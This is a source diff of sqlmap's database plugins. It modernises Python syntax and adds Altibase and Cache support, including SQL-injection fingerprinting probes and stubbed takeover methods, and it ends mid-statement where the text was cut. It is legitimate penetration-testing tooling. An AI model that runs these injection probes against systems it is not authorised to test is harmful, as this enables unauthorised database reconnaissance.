b/plugins/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/plugins/dbms/__init__.py b/plugins/dbms/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/plugins/dbms/__init__.py +++ b/plugins/dbms/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/plugins/dbms/access/__init__.py b/plugins/dbms/access/__init__.py index 4df52f81250..fbb3a131c46 100644 --- a/plugins/dbms/access/__init__.py +++ b/plugins/dbms/access/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import DBMS @@ -23,11 +23,7 @@ class AccessMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Tak def __init__(self): self.excludeDbsList = ACCESS_SYSTEM_DBS - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) + for cls in self.__class__.__bases__: + cls.__init__(self) unescaper[DBMS.ACCESS] = Syntax.escape diff --git a/plugins/dbms/access/connector.py b/plugins/dbms/access/connector.py index 40160f0f242..91b8f246649 100644 --- a/plugins/dbms/access/connector.py +++ b/plugins/dbms/access/connector.py @@ -1,17 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ try: import pyodbc -except ImportError: +except: pass import logging +from lib.core.common import getSafeExString from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -21,16 +22,12 @@ class Connector(GenericConnector): """ - Homepage: http://pyodbc.googlecode.com/ - User guide: http://code.google.com/p/pyodbc/wiki/GettingStarted - API: http://code.google.com/p/pyodbc/w/list + Homepage: https://github.com/mkleehammer/pyodbc + User guide: https://github.com/mkleehammer/pyodbc/wiki Debian package: python-pyodbc License: MIT """ - def __init__(self): - GenericConnector.__init__(self) - def connect(self): if not IS_WIN: errMsg = "currently, direct connection to Microsoft Access database(s) " @@ -42,26 +39,26 @@ def connect(self): try: self.connector = pyodbc.connect('Driver={Microsoft Access Driver (*.mdb)};Dbq=%s;Uid=Admin;Pwd=;' % self.db) - except (pyodbc.Error, pyodbc.OperationalError), msg: - raise SqlmapConnectionException(msg[1]) + except (pyodbc.Error, pyodbc.OperationalError) as ex: + raise SqlmapConnectionException(getSafeExString(ex)) self.initCursor() - self.connected() + self.printConnected() def fetchall(self): try: return self.cursor.fetchall() - except pyodbc.ProgrammingError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + except pyodbc.ProgrammingError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) return None def execute(self, query): try: self.cursor.execute(query) - except (pyodbc.OperationalError, pyodbc.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - except pyodbc.Error, msg: - raise SqlmapConnectionException(msg[1]) + except (pyodbc.OperationalError, pyodbc.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + except pyodbc.Error as ex: + raise SqlmapConnectionException(getSafeExString(ex)) self.connector.commit() diff --git a/plugins/dbms/access/enumeration.py b/plugins/dbms/access/enumeration.py index 51e9d20fd14..806049186a0 100644 --- a/plugins/dbms/access/enumeration.py +++ b/plugins/dbms/access/enumeration.py @@ -1,81 +1,84 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.data import logger from plugins.generic.enumeration import Enumeration as GenericEnumeration class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - def getBanner(self): - warnMsg = "on Microsoft Access it is not possible to get a banner" - logger.warn(warnMsg) + warnMsg = "on Microsoft Access it is not possible to get the banner" + logger.warning(warnMsg) return None def getCurrentUser(self): warnMsg = "on Microsoft Access it is not possible to enumerate the current user" - logger.warn(warnMsg) + logger.warning(warnMsg) def getCurrentDb(self): warnMsg = "on Microsoft Access it is not possible to get name of the current database" - logger.warn(warnMsg) + logger.warning(warnMsg) - def isDba(self): + def isDba(self, user=None): warnMsg = "on Microsoft Access it is not possible to test if current user is DBA" - logger.warn(warnMsg) + logger.warning(warnMsg) def getUsers(self): warnMsg = "on Microsoft Access it is not possible to enumerate the users" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def getPasswordHashes(self): warnMsg = "on Microsoft Access it is not possible to enumerate the user password hashes" - logger.warn(warnMsg) + logger.warning(warnMsg) return {} - def getPrivileges(self, *args): + def getPrivileges(self, *args, **kwargs): warnMsg = "on Microsoft Access it is not possible to enumerate the user privileges" - logger.warn(warnMsg) + logger.warning(warnMsg) return {} def getDbs(self): warnMsg = "on Microsoft Access it is not possible to enumerate databases (use only '--tables')" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def searchDb(self): warnMsg = "on Microsoft Access it is not possible to search databases" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def searchTable(self): warnMsg = "on Microsoft Access it is not possible to search tables" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def searchColumn(self): warnMsg = "on Microsoft Access it is not possible to search columns" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def search(self): warnMsg = "on Microsoft Access search option is not available" - logger.warn(warnMsg) + logger.warning(warnMsg) def getHostname(self): warnMsg = "on Microsoft Access it is not possible to enumerate the hostname" - logger.warn(warnMsg) + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on Microsoft Access it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/access/filesystem.py b/plugins/dbms/access/filesystem.py index cdc28647418..bb8c17d1ec8 100644 --- a/plugins/dbms/access/filesystem.py +++ b/plugins/dbms/access/filesystem.py @@ -1,21 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def readFile(self, rFile): + def readFile(self, remoteFile): errMsg = "on Microsoft Access it is not possible to read files" raise SqlmapUnsupportedFeatureException(errMsg) - def writeFile(self, wFile, dFile, fileType=None): + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): errMsg = "on Microsoft Access it is not possible to write files" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py index bb07ea37b6f..e542e889ece 100644 --- a/plugins/dbms/access/fingerprint.py +++ b/plugins/dbms/access/fingerprint.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re @@ -10,9 +10,8 @@ from lib.core.common import Backend from lib.core.common import Format from lib.core.common import getCurrentThreadData -from lib.core.common import randomInt from lib.core.common import randomStr -from lib.core.common import wasLastRequestDBMSError +from lib.core.common import wasLastResponseDBMSError from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -49,11 +48,12 @@ def _sysTablesCheck(self): # Microsoft Access table reference updated on 01/2010 sysTables = { - "97": ("MSysModules2", "MSysAccessObjects"), - "2000" : ("!MSysModules2", "MSysAccessObjects"), - "2002-2003" : ("MSysAccessStorage", "!MSysNavPaneObjectIDs"), - "2007" : ("MSysAccessStorage", "MSysNavPaneObjectIDs"), - } + "97": ("MSysModules2", "MSysAccessObjects"), + "2000": ("!MSysModules2", "MSysAccessObjects"), + "2002-2003": ("MSysAccessStorage", "!MSysNavPaneObjectIDs"), + "2007": ("MSysAccessStorage", "MSysNavPaneObjectIDs"), + } + # MSysAccessXML is not a reliable system table because it doesn't always exist # ("Access through Access", p6, should be "normally doesn't exist" instead of "is normally empty") @@ -67,8 +67,7 @@ def _sysTablesCheck(self): negate = True table = table[1:] - randInt = randomInt() - result = inject.checkBooleanExpression("EXISTS(SELECT * FROM %s WHERE %d=%d)" % (table, randInt, randInt)) + result = inject.checkBooleanExpression("EXISTS(SELECT * FROM %s WHERE [RANDNUM]=[RANDNUM])" % table) if result is None: result = False @@ -91,13 +90,12 @@ def _getDatabaseDir(self): infoMsg = "searching for database directory" logger.info(infoMsg) - randInt = randomInt() randStr = randomStr() - inject.checkBooleanExpression("EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt)) + inject.checkBooleanExpression("EXISTS(SELECT * FROM %s.%s WHERE [RANDNUM]=[RANDNUM])" % (randStr, randStr)) - if wasLastRequestDBMSError(): + if wasLastResponseDBMSError(): threadData = getCurrentThreadData() - match = re.search("Could not find file\s+'([^']+?)'", threadData.lastErrorPage[1]) + match = re.search(r"Could not find file\s+'([^']+?)'", threadData.lastErrorPage[1]) if match: retVal = match.group(1).rstrip("%s.mdb" % randStr) @@ -131,13 +129,14 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] + banVer = kb.bannerFp.get("dbmsVersion") - if re.search("-log$", kb.data.banner): - banVer += ", logging enabled" + if banVer: + if re.search(r"-log$", kb.data.banner or ""): + banVer += ", logging enabled" - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) htmlErrorFp = Format.getErrorParsedDBMSes() @@ -149,7 +148,7 @@ def getFingerprint(self): return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(ACCESS_ALIASES) or conf.dbms in ACCESS_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(ACCESS_ALIASES): setDbms(DBMS.ACCESS) return True @@ -163,11 +162,11 @@ def checkDbms(self): infoMsg = "confirming %s" % DBMS.ACCESS logger.info(infoMsg) - result = inject.checkBooleanExpression("IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0") + result = inject.checkBooleanExpression("IIF(ATN(2) IS NOT NULL,1,0) BETWEEN 2 AND 0") if not result: warnMsg = "the back-end DBMS is not %s" % DBMS.ACCESS - logger.warn(warnMsg) + logger.warning(warnMsg) return False setDbms(DBMS.ACCESS) @@ -186,7 +185,7 @@ def checkDbms(self): return True else: warnMsg = "the back-end DBMS is not %s" % DBMS.ACCESS - logger.warn(warnMsg) + logger.warning(warnMsg) return False diff --git a/plugins/dbms/access/syntax.py b/plugins/dbms/access/syntax.py index 0e7184081a5..9935739d90c 100644 --- a/plugins/dbms/access/syntax.py +++ b/plugins/dbms/access/syntax.py @@ -1,19 +1,22 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.convert import getOrds from plugins.generic.syntax import Syntax as GenericSyntax class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - @staticmethod def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)&CHR(98)&CHR(99)&CHR(100)&CHR(101)&CHR(102)&CHR(103)&CHR(104) FROM foobar" + True + """ + def escaper(value): - return "&".join("CHR(%d)" % ord(_) for _ in value) + return "&".join("CHR(%d)" % _ for _ in getOrds(value)) return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/access/takeover.py b/plugins/dbms/access/takeover.py index 315abc77af6..cb6e1fa7971 100644 --- a/plugins/dbms/access/takeover.py +++ b/plugins/dbms/access/takeover.py @@ -1,17 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.takeover import Takeover as GenericTakeover class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - def osCmd(self): errMsg = "on Microsoft Access it is not possible to execute commands" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/altibase/__init__.py b/plugins/dbms/altibase/__init__.py new file mode 100644 index 00000000000..a8e50cf19db --- /dev/null +++ b/plugins/dbms/altibase/__init__.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import ALTIBASE_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from plugins.dbms.altibase.enumeration import Enumeration +from plugins.dbms.altibase.filesystem import Filesystem +from plugins.dbms.altibase.fingerprint import Fingerprint +from plugins.dbms.altibase.syntax import Syntax +from plugins.dbms.altibase.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class AltibaseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Altibase methods + """ + + def __init__(self): + self.excludeDbsList = ALTIBASE_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.ALTIBASE] = Syntax.escape diff --git a/plugins/dbms/altibase/connector.py b/plugins/dbms/altibase/connector.py new file mode 100644 index 00000000000..bf0f66a6c42 --- /dev/null +++ b/plugins/dbms/altibase/connector.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + def connect(self): + errMsg = "on Altibase it is not (currently) possible to establish a " + errMsg += "direct connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/altibase/enumeration.py b/plugins/dbms/altibase/enumeration.py new file mode 100644 index 00000000000..467897eb336 --- /dev/null +++ b/plugins/dbms/altibase/enumeration.py @@ -0,0 +1,20 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getStatements(self): + warnMsg = "on Altibase it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] + + def getHostname(self): + warnMsg = "on Altibase it is not possible to enumerate the hostname" + logger.warning(warnMsg) diff --git a/plugins/dbms/altibase/filesystem.py b/plugins/dbms/altibase/filesystem.py new file mode 100644 index 00000000000..2e61d83c07c --- /dev/null +++ b/plugins/dbms/altibase/filesystem.py @@ -0,0 +1,11 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + pass diff --git a/plugins/dbms/altibase/fingerprint.py b/plugins/dbms/altibase/fingerprint.py new file mode 100644 index 00000000000..8c99a80ea1f --- /dev/null +++ b/plugins/dbms/altibase/fingerprint.py @@ -0,0 +1,95 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import ALTIBASE_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.ALTIBASE) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.ALTIBASE + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(ALTIBASE_ALIASES): + setDbms(DBMS.ALTIBASE) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.ALTIBASE + logger.info(infoMsg) + + # Reference: http://support.altibase.com/fileDownload.do?gubun=admin&no=228 + result = inject.checkBooleanExpression("CHOSUNG(NULL) IS NULL") + + if result: + infoMsg = "confirming %s" % DBMS.ALTIBASE + logger.info(infoMsg) + + result = inject.checkBooleanExpression("TDESENCRYPT(NULL,NULL) IS NULL") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.ALTIBASE + logger.warning(warnMsg) + + return False + + setDbms(DBMS.ALTIBASE) + + self.getBanner() + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.ALTIBASE + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/altibase/syntax.py b/plugins/dbms/altibase/syntax.py new file mode 100644 index 00000000000..7ba5c8b9f38 --- /dev/null +++ b/plugins/dbms/altibase/syntax.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("CHR(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/altibase/takeover.py b/plugins/dbms/altibase/takeover.py new file mode 100644 index 00000000000..abc2f4d9f61 --- /dev/null +++ b/plugins/dbms/altibase/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on Altibase it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on Altibase it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on Altibase it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on Altibase it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/cache/__init__.py b/plugins/dbms/cache/__init__.py new file mode 100644 index 00000000000..b4c8abdce26 --- /dev/null +++ b/plugins/dbms/cache/__init__.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import CACHE_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from plugins.dbms.cache.enumeration import Enumeration +from plugins.dbms.cache.filesystem import Filesystem +from plugins.dbms.cache.fingerprint import Fingerprint +from plugins.dbms.cache.syntax import Syntax +from plugins.dbms.cache.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class CacheMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Cache methods + """ + + def __init__(self): + self.excludeDbsList = CACHE_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.CACHE] = Syntax.escape diff --git a/plugins/dbms/cache/connector.py b/plugins/dbms/cache/connector.py new file mode 100644 index 00000000000..2f2d3c5102f --- /dev/null +++ b/plugins/dbms/cache/connector.py @@ -0,0 +1,77 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +try: + import jaydebeapi + import jpype +except: + pass + +import logging + +from lib.core.common import checkFile +from lib.core.common import getSafeExString +from lib.core.common import readInput +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/ + User guide: https://pypi.python.org/pypi/JayDeBeApi/#usage & http://jpype.sourceforge.net/doc/user-guide/userguide.html + API: - + Debian package: - + License: LGPL & Apache License 2.0 + """ + + def connect(self): + self.initConnection() + try: + msg = "please enter the location of 'cachejdbc.jar'? " + jar = readInput(msg) + checkFile(jar) + args = "-Djava.class.path=%s" % jar + jvm_path = jpype.getDefaultJVMPath() + jpype.startJVM(jvm_path, args) + except Exception as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + try: + driver = 'com.intersys.jdbc.CacheDriver' + connection_string = 'jdbc:Cache://%s:%d/%s' % (self.hostname, self.port, self.db) + self.connector = jaydebeapi.connect(driver, connection_string, str(self.user), str(self.password)) + except Exception as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except Exception as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) + return None + + def execute(self, query): + retVal = False + + try: + self.cursor.execute(query) + retVal = True + except Exception as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) + + self.connector.commit() + + return retVal + + def select(self, query): + self.execute(query) + return self.fetchall() diff --git a/plugins/dbms/cache/enumeration.py b/plugins/dbms/cache/enumeration.py new file mode 100644 index 00000000000..4ac3e1acca7 --- /dev/null +++ b/plugins/dbms/cache/enumeration.py @@ -0,0 +1,48 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from lib.core.settings import CACHE_DEFAULT_SCHEMA +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getCurrentDb(self): + return CACHE_DEFAULT_SCHEMA + + def getUsers(self): + warnMsg = "on Cache it is not possible to enumerate the users" + logger.warning(warnMsg) + + return [] + + def getPasswordHashes(self): + warnMsg = "on Cache it is not possible to enumerate password hashes" + logger.warning(warnMsg) + + return {} + + def getPrivileges(self, *args, **kwargs): + warnMsg = "on Cache it is not possible to enumerate the user privileges" + logger.warning(warnMsg) + + return {} + + def getStatements(self): + warnMsg = "on Cache it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] + + def getRoles(self, *args, **kwargs): + warnMsg = "on Cache it is not possible to enumerate the user roles" + logger.warning(warnMsg) + + return {} + + def getHostname(self): + warnMsg = "on Cache it is not possible to enumerate the hostname" + logger.warning(warnMsg) diff --git a/plugins/dbms/cache/filesystem.py b/plugins/dbms/cache/filesystem.py new file mode 100644 index 00000000000..2e61d83c07c --- /dev/null +++ b/plugins/dbms/cache/filesystem.py @@ -0,0 +1,11 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + pass diff --git a/plugins/dbms/cache/fingerprint.py b/plugins/dbms/cache/fingerprint.py new file mode 100644 index 00000000000..909f42d2442 --- /dev/null +++ b/plugins/dbms/cache/fingerprint.py @@ -0,0 +1,113 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.common import hashDBRetrieve +from lib.core.common import hashDBWrite +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.enums import FORK +from lib.core.enums import HASHDB_KEYS +from lib.core.session import setDbms +from lib.core.settings import CACHE_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.CACHE) + + def getFingerprint(self): + fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) + + if fork is None: + if inject.checkBooleanExpression("$ZVERSION LIKE '%IRIS%'"): + fork = FORK.IRIS + else: + fork = "" + + hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork) + + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.CACHE + if fork: + value += " (%s fork)" % fork + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + if fork: + value += "\n%sfork fingerprint: %s" % (blank, fork) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(CACHE_ALIASES): + setDbms(DBMS.CACHE) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.CACHE + logger.info(infoMsg) + + result = inject.checkBooleanExpression("$LISTLENGTH(NULL) IS NULL") + + if result: + infoMsg = "confirming %s" % DBMS.CACHE + logger.info(infoMsg) + + result = inject.checkBooleanExpression("%EXTERNAL %INTERNAL NULL IS NULL") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.CACHE + logger.warning(warnMsg) + + return False + + setDbms(DBMS.CACHE) + + self.getBanner() + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.CACHE + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/cache/syntax.py b/plugins/dbms/cache/syntax.py new file mode 100644 index 00000000000..9a23d5195a1 --- /dev/null +++ b/plugins/dbms/cache/syntax.py @@ -0,0 +1,23 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> from lib.core.common import Backend + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("CHAR(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/cache/takeover.py b/plugins/dbms/cache/takeover.py new file mode 100644 index 00000000000..332b33887e0 --- /dev/null +++ b/plugins/dbms/cache/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on Cache it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on Cache it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on Cache it is not possible to establish an " + errMsg += "out-of-band connection" + raise 